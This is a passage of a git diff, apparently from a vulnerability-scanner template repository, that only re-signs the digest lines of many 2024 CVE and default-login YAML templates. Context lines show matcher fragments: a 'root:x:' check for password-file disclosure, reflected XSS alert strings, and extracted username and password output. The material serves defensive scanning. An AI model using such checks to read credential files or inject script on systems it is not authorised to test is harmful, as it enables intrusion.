b/http/cves/2024/CVE-2024-22927.yaml index ba9abebe76..00179862c4 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f09b876bffc9bf19fef23c0132b906e61dad6194d544af49d2ebe2e55461d5810220763e5580653e88278ab1d2571df408542dd92b59b9f7be3212fd27693d4f1bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d56c054dfa9f7fe7f6545e75fa158ccb1087a39f04e8788c87fda5a82d08bde2022017e4ffcc92a50b5af00e21322b670730737c9d8c775183d4b69e7ea4d2ed381e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 66902335a2..d63f57692f 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -73,4 +73,4 @@ http: - "contains(content_type,'application/xml')" - "contains(body,'<projects href=')" condition: and -# digest: 4a0a00473045022042ca57e91002eeb95a0974c5cd85344b00d8168df68b416ab82e02dc3fdf729c0221009dc47418fd94b57d224080240cf710c7b669b600f37a6cfb92a1b1f75880b62c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220148e3d60d45a7598faca5ac1e4372beb469bb5270575a9ba24836b84e7efeb21022100ddaf2714ec4ab4c387e2b72f8cbf8380913ae7440af993a425a2347acb1f0b7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 8498796778..1e44d3388d 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020f676dd7f70abc3d6a1d63bbd9c429e82c76b006a9b56d43a858050223f5b99022100a3dbccc48bd76c7a8f160c72ba8cbc13307a3663abebb859d6a22bd8a44683e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220032d4b97b591843081cb56c3a14d32090188597aa26e4f4db65465e16de4ee4e02205e181868582419cc3fcb00ffae21c2d1a96c3d5604d6053e235459942752d31d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25669.yaml b/http/cves/2024/CVE-2024-25669.yaml index 63ed8e2075..512b9aabb3 100644 --- a/http/cves/2024/CVE-2024-25669.yaml +++ b/http/cves/2024/CVE-2024-25669.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204fd5e74ee54c20db7c3cd5d1790ab78c384eddacdb1bf6ab4888e62b47bb923202202cd297fb7131e47bfcbdfb0b0fecfb9e7389b820ed1ade4c78b2789b4750b18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6a58d9146204ae0ffb0ab57b75f31c8cc8a2904197b3012eea9461123594e2c02200233a9dfb0f2290cadf406d7908d4f86522a9344cf74429dfbab394d62a05d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index c8d2d8a071..740ccf33a6 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094aa267e9fcefa3b5cf6035541b466cd9772aa5cfe6735980c1bd6d4f2c481d9022100c63d8c195e067f627d83b89909d50cb22d9b5f1c25edc5d8fb8edad4d04458cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089ae34c1356c7a3fcbe4fd3f863ccf350a6212f8f027d22935fd77435e6f3cb002201dbc01d34ec78fdc6c513b82ba17a53b6508a1d3e3bf07cd4c8e6d4989454a5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index d8d5d1b9b6..24940ac680 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f98d8732efab432fb4a5776fb0cffdfa3bab1be29596883a3f08213b7a32c77022051ca3c0c66461b6fb3cb1c9ccbd1040c30467f4e59e830fd2bdc7f88370b331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ddc2fba9fc4b4c139630136f53ceb821c4a827a26c4cb8c3d0e265aa4623a89c022100cdf4351140e2e01daa44e99fd95c6da5b9a9769e50ef01bc57de9712f58434a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index 0c304b3c1a..3d96ee8a18 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "buildNumber", "server version", "internalId")' condition: and -# digest: 490a00463044022028b6be218203626d48f0b0865d2531c617d75554ef795f70ae685e3055bb57d102200d791cf8dd53b096852970c4907cedf2d11bb1e09ae7990dfd78422b2180037d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0849961f44a2fee3b59f3c520432b723a00791dc5d185d1f038e82d19c43f0a02201394347c9b846db379a0bd5082e2e1a6527d4ecec7b55841322f69307cd641ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27497.yaml b/http/cves/2024/CVE-2024-27497.yaml index e081646a81..30e4387be9 100644 --- a/http/cves/2024/CVE-2024-27497.yaml +++ b/http/cves/2024/CVE-2024-27497.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d648ce17e1aa4e428a0b0e1e97efcc77a38d967b78bb04310f2fe738453b8bf8022100c19b01d2806b0f6b8a012dabc56b3481e922186c96e66065dd43882342386a9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc45a3642ab4b42420d1363596d33f08fb8092e527d7bafbe36f1d860115fe6b022100bf43e1c1bd2ccdaa945c05099e77a2b9b4c3a24f6ecafba7aecfbaed81b6e3e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml index 65a8b04159..df793f0dbb 100644 --- a/http/cves/2024/CVE-2024-27564.yaml +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -38,4 +38,4 @@ http: - contains(header, "image/jpeg") - status_code == 200 condition: and -# digest: 4a0a00473045022100b9b55cd78c5bb4e24de24aca20920e6ba2c0d52798af31282704de45a856095602206312e280926ef5b729c9178e0324d61a55b67c1ab2fb12752b2f46b3ac3dea97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 1caaaf778a..02bf62546f 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -80,4 +80,4 @@ http: - "contains(body_1,'ObjRef')" - "contains(x_vuln_test,'{{randstr}}')" condition: and -# digest: 4a0a004730450220766c9dfdbd7c65d458c73a8027ecca8ee56bf3dec4557d50ad109a37973b1c73022100adfdf589102d64e02c957796c152d64d392744895647a56b7d61d9b1e041b61e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220345063f60a2d0c6207c121752f7cb77e3dcbed7838778fba2d50401c0157e8b3022100c4030d56682e9556b292d09469ecf21d4119b2f3b7dd00ad8d5ee7c70a1c1f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index eb0aa9cab6..f0a367cfae 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200580ebc91fbdcc0e60ee951ef840f931255129d83c455327d2b43c2da2c42c67022100a1d7c4877dbfdbdca2f30aea0099503a024334a4e4cfec758cd9b8700f49c3e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cf9cdd69982a8e227f0c764131f0bd599577b93aa5bd10b754c70d912602c36022043662719fb8ead44e0995b7428e6c96ea3079f74f0382eb42bc39d181c0b284a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 074b6646ff..ed5e15f914 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d9304152d30fa5644b18033462ab1ed52f23ce5c4a695a6a8aebb824ca3ea457022100e6b1c27bfc23808cc83a3cad56e4e7796d3483c7fb35c8253aaddad5a1aac110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100855b41a796131b8698eb12f78f117662e6af38aa8fcb1b42a37c4632b6c435900220650b6ae50a13b556b12b96269eb1d8e840cb3d4cc47a5667bcbc6e030cf4ff56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index be4a41b369..34f2fed234 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f60c280d7939cdf6b9764473554ef08e27b39bc7a89269b236a5da5edebf2fcc0220595629ffc7c8ac007cf49020d64692109e9ac850c921d72f04ac2ba928314dec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202bba0b10fd785f68ccd28a5a844100e8774efb025416d9d1bc2ea8a8b8937d36022021998db80800ce9ef7ecaf3a5b1807731fb4531b4d0e6ed59f7a398324d6cf8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index f3cfac9d3d..f5d822ffce 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220350a856e04e48e23fe92d6383c1292fd9ec12afc4abe82ff10a7113ce0bd063602204757c78c4c1d5f0dba539eab295cf5a3beb8a0379c05189b7939ce27c38eccc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c377b55013c499dc07d8fb55d4358d50ac1592dd053759aa2583a3e6ad9aba85022054b63bed022c6de67a1b2dd3684efd8c746747afe322a61d2928c1a92fc358fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index 5305128715..9517843e15 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cd99b8c05029378ef0f9167eea055e01f7fd30120908e870d3c8630899512f8f0220219632a880b9347a2f3e03d3640aa1ac332329928fe54c97d522fe72445c18e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bbf300b0ea549282dc1258f3c481521e094057630ded471600235926cfb8aad022043e0add2cc98eeefeaed68b619c6ec62bd46e6d640ae65e66f49a5431c5fde93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31851.yaml b/http/cves/2024/CVE-2024-31851.yaml index f4a5a8d55b..753f621b07 100644 --- a/http/cves/2024/CVE-2024-31851.yaml +++ b/http/cves/2024/CVE-2024-31851.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100842e24cc880d77226e1303cecc992eba04ec11f26e0a04b9dda1a8e79668d748022100bf52bffb2d81f6061330180b33406e553b52f778bc07ebb4365d98c249849ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090d4d9de6346bbb09774928cf9feff8c35a86741a0bc5b6e125cb7202cff980502204c5052b55e340d12b6ef19bdb5e3bbd27f725bb837e394805e12ddb092fbc272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index fb7ccca466..886747665b 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -40,4 +40,4 @@ http: - 'contains_all(body, "Unhandled Exception")' - 'contains_all(header,"cfid","cftoken")' condition: and -# digest: 490a0046304402205137d62a1a156eb05abb3b8cf2e25cf11515c4d7e2f7e0180a2178ad123af0d1022076a749c27251a5412b13e303a6a6724eb2c1d40dbfe236975cd2f0f1050201dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206eccd0783b81a569061e6e996a33b917a1eca34bb2e26b04e47993cf4137690f02203413cd6642c7e01f2dbd3b6bf10fba063c483073a1da5349b56a666d945f008e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 1a3315eb7e..c59456c1c0 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -54,4 +54,4 @@ http: - type: dsl dsl: - compare_versions(version, '<= 0.45.20') -# digest: 490a004630440220166f3ac3c6c4657641c4499aa0d8cd1096190ee1a19bb4497770c30fac5558da0220174976fb80906ac6496cdb1e657106b3c93cdde5f8980ed3ab7c0bcf2de63113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fababded42d7a17ed446608da54c1802c86f5ad0eff6a4f9f9c6299a3d4e0f9e022100843a8f54563f6dd62aa6d9d160e9ad7f886f39d623887bca9819f2e2fbb93ce4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index bb24109108..5af765fb8b 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022072033feeeb4826d2bee7c874213d2df871af8bf13afc1f3c980f299181f16f62022029ff80065f468b347cdf1c0833940b14cb59adce81580ba0ae7e1771cef64f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203982bd27134560aeb8fa52d09e98ad42fbbbcaf319d257593aed74bef082be5a02202be13f559cdcb1d20876067e3f5b91f3264f7c62311e31c8907fbeac7990117e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index e125e8a9cc..b5a553eda2 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -39,4 +39,4 @@ http: - 'status_code == 200' - 'contains(body, "um-debug<br/>")' condition: and -# digest: 4b0a00483046022100dbb0583fe89fcebeeb2230544ab50b45edc164b04b429997fe398e1f6cfb1670022100a8e7242f47dbf36e5d828171cd525c4c7c76ce5e97ad9fefa5f9f3e5c77cab50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a78c33e192853e8fcda0de18684d06e49ae77793a8e3ceea2344f78a9aa7137302203845d1d0be3f8a221e28560b7f7156739ffa43d6db8b4bd532cd3c798f94e5b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index cde00d75c5..ed32e9105c 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")' condition: and -# digest: 4a0a00473045022100a6bc5b2793ecbad05e108bd81bbd41b4b22e58e61837998f0f6a2aacb1af3dff02203c428c70431c5b3c1cbc7ca7641dac68dab0d4cd1b99ea4023ac9950ec713dee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f171f03365c6716cd5b33b6e633c89d3e53a1d7ab8d4b398024e89aac6c1bb0e02210099d5fc6859262fe72c402f09f033747008b8fd3198c534a24aa197c1ce0c4d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index e7d578bcf0..a9d651ea8b 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -57,4 +57,4 @@ http: - status_code_1 == 404 && status_code_3 == 403 - contains(body_2, 'invalid required input parameters') condition: and -# digest: 4a0a0047304502210097e7c06d535f21e4ee301a8bf020f8f4a5a6667b450ceb48d188567cc43459210220349129284fd3663abeb841c36f44ecd03d773aa19eb89af9da6cfc82792d49cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aea1f0b3bf8fcbf9b028775de7eee9c1f158aad09cea1518a4ac483b00268ffd02205db7564fb596e8ada469884d750e9125102b47ee3826d62a03e40fbd09bf9ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index aedfed7ed9..72f5fc1a86 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5aab6fe35d6181963300dc1caea35fb8dd70f83613f032e088a5ddb1a199f3602206474aa1192edf553bb5ac6a3e5d30c743a8c1357ba6b0deb2585b3bcb44f4ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051184fed9b9a4b1966d32d775675ae1770f24224d547667500500ad3177f5476022100fc9e3a62f08e8debfd9a15e004208573ed4273bfd4d6f2d48e09f8a46bcff1ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index ec21ffbb89..b59749affd 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -35,4 +35,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "<p><script>alert(\"document.domain\")</script></p>")' condition: and -# digest: 490a004630440220167f065e360fd80541c2b69728e0f3749a99e3b73a6823ec510fa37bda6fbf1002205c5394d8306ae3f4e96c5bc535563f00e5bee5776948d717b013aa594ec46219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2868a59e3c34566b08f8ff3f5b24fc9f7f7ecea4d923f906a1883ce70911da902205775a0c8bed2a2337a63d20c67755f6389a31b1023ba8be4c58056e10107894a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index 0b82cbea2a..4820b4f970 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -124,4 +124,4 @@ http: part: body words: - "root:x:" -# digest: 4a0a00473045022016f9960caefebe9812cebc8ea4a19c3818eca4e22ee5d653c3c651cb21120fae022100abc41e3e04f0659ca3c47dfff8554f225c6019f4541021d02307c5fc01c1ecf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205948e827bf5269dd832ea8fc33d44f6117231bf9ad76ba8e2cb63850d4e41fb8022100dc3dd1a4a7e74dc17bfa8f30e8cf13605fbbc7bf05806d9aca6243bf03db95ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index fd4b518a60..04504f7d8b 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a145e39458a5bafa9946a183c0148736e45daf0ec28820e8c442fb5684d901a102206a30ac5570efedae5b2847a92e5cfad3a5d1cfd71dfc2ad82563d2e57ec9dbd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206260c934d288615aaeb670fe5578235b6f88ea430cb576d396053d632dd1dc880220219844f51c66f70e35b91c1c9cebf6a80739618fe718297ec00954bcc77c4dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index c4bc18267d..9aefadc722 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -61,4 +61,4 @@ http: dsl: - '"Username: "+ user' - '"Password: "+ pass' -# digest: 4a0a00473045022073c556e756e6d6fb4b9792f22067ff76c6003d9505047f3905f340af05df6d48022100e433930cd957e1bf060ea49fa34577268b5f703eea322d42d45ed8153879fb57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b40c2678a88f956f4c6349fda05d4d83541374a2907b8731a90941505551b493022100f53a3591f5bd4a3fb03698db001d452302dd2217004277971fc01d9af5e9569f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index d75eb1260b..32e34ce6db 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -41,4 +41,4 @@ http: - contains(header, "application/octet-stream") - status_code == 200 condition: and -# digest: 4a0a00473045022100f3fc0d77fbae2962a5f1baf5b9986fc4abe4ea968b3898fec35782a662cb3fbf022020a1ce16cea9d0dcfd42f0b7fe6550ada932bec3e3c8e4774c9254046ac4dfa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a7b25f9491118611601e54fc059c402e3e33091cab3c23e78360700c3e111db022000eb7088fe6c09b5cb1896a2296d7331e0036e4686346643a7cf000e2b80315a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/3com/3Com-wireless-default-login.yaml b/http/default-logins/3com/3Com-wireless-default-login.yaml index ff639e033e..afcda3aa92 100644 --- a/http/default-logins/3com/3Com-wireless-default-login.yaml +++ b/http/default-logins/3com/3Com-wireless-default-login.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a7a5661481f35e84ca927a1574e6a7b1b27ccb361354be2361a526339dec9a5502210098c54dbb1de14bbe6bc295ca69566df20d65ab0b3bb0f9ffcdf3f8815c7684cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa98c552ff821787da07454a86d3b1ffcd7967dbb4b411a95d430b53a7ccc1af02207ccff574e15cfc77d39a88086cc3f5087f31e4a60962c412cf82800390358b54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml index 1eb6139034..225cf5ab6b 100644 --- a/http/default-logins/ampjuke-default-login.yaml +++ b/http/default-logins/ampjuke-default-login.yaml @@ -59,4 +59,4 @@ http: regex: - 'name="uuid" value="([./a-z0-9-]+)">' internal: true -# digest: 490a0046304402201cc8ef1362131ffb99ceea9b2bd251961020c1a7d095a8588a269fff0b6bb66402205a78622f15123331eb83ca7cc6db264f141cf762eceaedbd64d3ccdb5b952b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a7d7a4053a55ee2fd87bdb54447c57918b5e01753144450843af403ebb10aa40221009417d55a42799dd32bc24720a398c20dcea43f7f16c933fae4ec213ea2ea75fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml index 2ebca97d0b..72162ff57a 100644 --- a/http/default-logins/asus/asus-rtn16-default-login.yaml +++ b/http/default-logins/asus/asus-rtn16-default-login.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e5edc14dff54097d5cd074539630205b93a4e24cb03cb7e5fd3b70cae381045b022055263b212fe7e1e32e458b2613e266d061932ef673f26709afb626a3e3797b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/asus/asus-wl500g-default-login.yaml b/http/default-logins/asus/asus-wl500g-default-login.yaml index 15637088ad..9781cb94c5 100644 --- a/http/default-logins/asus/asus-wl500g-default-login.yaml +++ b/http/default-logins/asus/asus-wl500g-default-login.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206359a6512f7d913a8a6eaaa9e886376e8ff7c73119f7b6dcbef2d6175e2a2fc5022100e260842f0946002cb0728695b1832997d779927462b2f4deefd55da09193f5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009741ffb4288b9f348c9f0d137da96526ddacb9d3b3e8320b4754b7c210d8726902202df21b78a91a18c5a59cef1064bfa447d02b2426f31bff9d528f4f247c93793c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/asus/asus-wl520GU-default-login.yaml b/http/default-logins/asus/asus-wl520GU-default-login.yaml index 5fa19cc132..8c013d4f4f 100644 --- a/http/default-logins/asus/asus-wl520GU-default-login.yaml +++ b/http/default-logins/asus/asus-wl520GU-default-login.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022017c5ae1ae8978c04a3cb2dc914cbbfec2fb928e5f41a2a47fd176bfca251208a02203e93dc759abb343620866936cfc3cad973727bab49420ad7e0781524ca285cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042345f2170e2313f96816d27d32f98a5c6ca83429352472aa0d1dcbd0e7fd3db02206c6b669ae9a7b7e19e2b353e5500ec80bd63728626b5342e5bf8114c6b591aa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index de7bd52229..76b1c780ce 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022060ca7e028b3cacd5e75c469c3b8df897700ecb1fa9e91f15b05eb6a50d9f2d31022100ab396afa79123b660bb4784387663ed5eb3f9767485f162c73fbe565f1fa8bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076e7f3e1a391ff7d8ae2709eac96e31007b48f86619ecded424f9bef3611d737022022431077acf65343c974693dd7a515230bc9e122025d2a3a48ee80ec67df15aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index df62621678..08ca9f474e 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -47,4 +47,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 490a00463044022047ed09e7cce78c6ef3d5812fd4d9f0c9b9325f82c20c0eeaaa4b280b7853ec810220750d2e91ea2a302be6eebf420b4dee340c13ff61593ff73ac8ba9db2582b68cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index 6fc4e57c36..b906ccff5b 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -56,4 +56,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 